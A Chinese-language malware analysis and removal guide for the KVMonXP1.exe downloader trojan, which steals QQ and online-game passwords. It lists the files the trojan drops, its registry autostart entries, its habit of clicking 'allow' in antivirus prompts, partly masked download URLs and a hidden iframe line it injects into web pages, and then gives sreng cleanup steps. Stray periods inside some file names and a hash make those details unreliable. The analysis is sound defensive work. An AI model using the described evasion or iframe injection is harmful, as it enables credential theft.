KVMonXP1.exe是盜號木馬,主要盜取如下網路遊戲的帳號和密碼:
QQ、魔獸世界、夢幻西遊、天龍八部等
基本介紹
- 中文名:KVMonXP1.exe
- 性質:盜號木馬
- 主要針對:QQ、魔獸世界、夢幻西遊天龍八部
- Modified: 2007年10月14日
基本信息,技術細節,解決方法,
基本信息
mydown(KVMonXP1.exe)下載者分析查殺
最近比較流行的一個下載者,作者在病毒體內註明“mydown”,並且病毒幾乎每日更新版本。
File: KVMonXP1.exe
Size: 28544 bytes
Modified: 2007年10月14日, 18:09:06
MD5: 4BEE5CDF02452751B7B62AC0CF3FA694
SHA1: 15B288B86BBF1503EE8C059A0E947D55A.5C392E8
CRC32: D0979BB4
殺軟命名:Trojan.DL.Win32.MyDown.d(瑞星)
技術細節
1.生成如下檔案
%Program Files%\Internet Explorer\KVMonXP1.exe(仿冒KV的監控進程)
%Program Files%\Internet Explorer\use1.dll
%Program Files%\Internet Explorer\user32.dll
2.添加註冊表啟動項目
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
{main}{rundll32.exe "%Program Files%\internet explorer\use1.dll" mymain} 的啟動項目 達到開機啟動的目的
3.查找如下視窗並且模擬按鍵導致.相應的安全軟體失效
“IE執行保護”--“允許執行”
“瑞星卡卡上網安全助手-IE防漏牆”--“允許”
查找卡巴斯基的如下視窗並模擬按鍵
“主動防禦信息”--“允許”
“主動防禦警報”--“允許”
“主動防禦警告”--“允許”
“主動防護提示”--“允許”
“主動防護警告”--“允許”
“主動防護警報”--“允許”
“主動防護信息”--“允許”
“創建規則”--“跳過”
“通信監控:終止連線”--“否”
查找如下視窗
“Kaspersky Anti-Virus: 通知” 並模擬按.鍵關閉該視窗
4.病毒體內有字樣“mydown”
5.連線網路
讀取http://web.*/soft/test.txt的下載列表下載木馬
http://web.*/soft/versoft.exe
http://web.*/soft/1.exe~http://web.*/soft/9.exe
http://web.*/soft/a.exe~http://web.*/soft/f.exe
其中http://web.*/soft/versoft.exe連結已失效,猜想是為了.更新病毒自身所用
其他為盜號木馬或者感染類病毒
其中http://web.*/soft/c.exe為感染htm,asp檔案的病毒
會在htm,asp等檔案尾部加入{/html}{iframe src=http://mm.987999*/abc.htm width=100 height=0}{/iframe}的代碼
並建立服務Remote Help Session Manager / Rasautol
...
木馬全部植入完畢以後,sreng日誌如下:
啟動項目
註冊表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{DiskMan32}{%systemroot%\DiskMan32.exe} []
{cmdbcs}{%systemroot%\cmdbcs.exe} []
{AVPSrv}{%systemroot%\AVPSrv.exe} []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
{MSDEG32}{LYLoader.exe} []
{MSDWG32}{LYLoadbr.exe} [N/A]
{MSDCG32 }{LY.Leador.exe} [N/A]
{MSDOG32}{LYLoador.exe} [N/A]
{MSDSG32}{LYLoadar.exe} [N/A]
{MSDMG32}{LYLoadmr.exe} [N/A]
{MSDHG32}{LYLoadhr.exe} [N/A]
{MSDQG32}{LYLoadqr.exe} [N/A]
{main}{rundll32.exe "%Program Files%\internet explorer\use1.dll" mymain} [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
{AppInit_DLLs}{rsztcpm.dll} []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
ShellExecuteHooks]
{{E418E9ED-9221-4661-B1F3-4AA35BD83832}}{%Program Files%\Internet Explorer\PLUGINS\WinSys88.Sys} []
{{4859245F-345D-BC13-AC4F-145D47DA34F4}}{%systemroot%\system32\avzxdmn.dll} []
{{334345F1-DACF-3452-CB7D-4620F34A1533}}{%systemroot%\system32\rsztcpm.dll} []
{{28907901-1416-3389-9981-372178569982}}{%systemroot%\system32\kawdbzy.dll} []
==================================
服務
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
{%systemroot%\system32\nts.okele.exe}{N/A}
解決方法
下載 sreng
http://download.kztechs.com/files/sreng2.zip
1.打開sreng
啟動項目 註冊表 刪除如下項目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{DiskMan32}{%systemroot%\DiskMan32.exe} []
{cmdbcs}{%systemroot%\cmdbcs.exe} []
{AVPSrv}{%systemroot%\AVPSrv.exe} []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
{MSDEG32}{LYLoader.exe} []
{MSDWG32}{LYLoadbr.exe} [N/A]
{MSDCG32 }{LYLeador.exe} [N/A]
{MSDOG32}{LYLoador.exe} [N/A]
{MSDSG32}{LYLoadar.exe} [N/A]
{MSDMG32}{LYLoadmr.exe} [N/A]
{MSDHG32}{LYLoadhr.exe} [N/A]
{MSDQG32}{LYLoadqr.exe} [N/A]
{main}{rundll32.exe "%Program Files%\internet explorer\use1.dll" mymain} [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
ShellExecuteHooks]
{{E418E9ED-9221-4661-B1F3-4AA35BD83832}}{%Program Files%\Internet Explorer\PLUGINS\WinSys88.Sys} []
“啟動項目”-“服務”-“Win32服務應用程式”中點“隱藏經認證的微軟項目”,
選中以下項目,點“刪除服務”,再點“設定”,在彈.出的框中點“否”:
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
{%systemroot%\system32\ntsokele.exe}{N/A}
2.雙擊我的電腦,工具,資料夾.選項,查看,單擊選取"顯示隱藏檔案或資料夾" 並清除"隱藏受保護的操作系.統檔案(推薦)"前面的鉤。在提示確定更改時,單擊“是” 然後確定
然後點擊 選單欄中的 搜尋按鈕
依次搜尋%systemroot%\system32\avzxdmn.dll
%systemroot%\system32\rsztcpm.dll
%systemroot%\system32\kawdbzy.dll
注意勾選 左邊高級選項的“搜尋隱藏的檔案和資料夾”
(插入圖snap1)
找到後右鍵選中該檔案 把他們重命名(最好有規律,比如1,2,3)
3.重啟計算機
刪除如下檔案
%Program Files%\Internet Explorer\KVMonXP1.exe
%Program Files%\Internet Explorer\use1.dll
%Program Files%\Internet Explorer\user32.dll
%systemroot%\system32\ntsokele.exe
%systemroot%\DiskMan32.exe
%systemroot%\cmdbcs.exe
%systemroot%\AVPSrv.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\DiskMan32.dll
%systemr.oot%\system32\kawdacs.dll
%systemroot%\system32\kawdbaz.exe
%systemroot%\system32\kawdbzy.dll
%systemroot%\system32\LYLOADER.EXE
%systemroot%\system32\LYMANGR.DLL
%systemroot%\system32\MSDEG32.DLL
%systemroot%\system32\nslookupi.exe
%Program Files%\Internet Explorer\PLUGINS\WinSys88.Sys
以及你剛重命名的
%systemroot%\system32\avzxdmn.dll
%systemroot%\system32\rsztcpm.dll
%systemroot%\system32\kawdbzy.dll
...
再次.打開sreng
啟動項目 註冊表 刪除如下項目
{{4859245F-345D-BC13-AC4F-145D47DA34F4}}{%systemroot%\system32\avzxdmn.dll} []
{{334345F1-DACF-3452-CB7D-4620F34A1533}}{%systemroot%\system32\rsztcpm.dll} []
{{28907901-1416-3389-9981-372178569982}}{%systemroot%\system32\kawdbzy.dll} []
雙擊AppInit_DLLs把其鍵值清空
4.修復受感染的htm,asp等網頁檔案
推薦使用CSI的iframkill
